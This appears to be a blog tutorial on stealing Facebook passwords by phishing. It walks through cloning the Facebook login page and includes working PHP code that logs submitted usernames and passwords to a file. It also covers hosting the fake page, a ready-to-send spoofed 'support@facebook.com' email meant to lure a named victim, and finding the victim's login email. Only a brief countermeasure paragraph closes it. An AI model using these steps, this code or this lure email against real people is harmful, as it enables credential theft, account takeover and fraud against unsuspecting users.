In this tutorial we will discus how you can hack
Facbook account password by phishing. Phishing is act of creating a
replica of legitimate website for stealing passwords and credit card numbers
etc. Here I will show you how you can create replica of facebook log-in page
and then fool your victim to put his username and password in it so that you
can get his account password
.
.
First of all open www.facebook.com in your web browser, from
“file” menu select “save as” and type “Facebook”
in file name and select “web page complete” from save as menu.
Once done you will have a file named “Facebook.html” and a folder
named “Facebook_files”. Folder will have several files in it, let
them as it is and open Facebook.html in notepad or word-pad. From
edit menu select find, type action in
it and locate following string.
action="https://www.facebook.com/login.php?login_attempt=1"
Now replace this string with
action= “mail.php”
Now open notepad type following code in it and create
mail.php.
Code:
<?php
header ('Location:
https://www.facebook.com/login.php?login_attempt=1 ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Now save it as mail.php and create an empty log.txt
file. Now you'll need a free web hosting service that supports PHP. Go to http://www.100best-free-web-space.com/
and select service and plan that suits you. Now in root folder of your website
create Facebook_files folder and upload all files in Facebook_files
of your hard disk to it. Come back to root folder and upload Facebook.html,
mail.php and log.txt in it. Change permission for log.txt that it can be seen
by administrator only. Once done make Facebook.html your index
page and make site live.
Now sign up with http://www.hoaxmail.co.uk/ it provides
spoofed email service. Now create a message from support@facebook.com to your
victim.
Sub: Invalid activity on your facebook account
Body:
Dear facebook user (victim's facebook user name),
Recently we saw some suspicious activity on your account, we
suspect it as a malicious script. As a valuable user to us we understand this
might be system error, if the activity is not generated by you then please
log-in to your account by following link,
<link to phished site>
Failing to log-in within next 48 hours Facebook holds right
to suspend your account for sake of privacy of you and others. By logging in
you'll confirm it is system error and we will fix it in no time. Your
inconvenience is regretted. Thank you.
support@facebook.com,
Facebook, Inc,
1601
S.California Ave
Palo Alto
CA 94394
US
If your victim is not security focused, he/she will surely
fall prey to it. And will log-in using phished site handing you his password in
log.txt file. Pleas note that you must use that email id of victim which he/she
uses to log in facebook. If you are in his/her friend list then click on
information tab to know log-in email ID.
Countermeasure:
You must not reply any message from facebook may it be
legitimate or not by clicking on any links that appear in mail box. Better
whenever you receive any mail of this type report it to facebook.com by logging
via typing www.facebook.com in your web browser.
No comments:
Post a Comment